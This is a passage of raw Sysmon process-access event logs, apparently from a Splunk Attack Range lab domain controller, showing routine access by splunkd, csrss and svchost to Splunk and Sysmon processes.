C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.002","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1277-5F25-0000-00108E560900}","TargetProcessId":"1360","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6558,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.002\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1277-5F25-0000-00108E560900}\r\nTargetProcessId: 1360\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.002","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1277-5F25-0000-00108E560900}","TargetProcessId":"1360","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6559,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.002\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.002","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6560,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.002\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.002","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6561,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.002\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.002","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6562,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.002\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.002","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6563,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.002\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.002","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6564,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.002\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.002","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6565,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.002\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 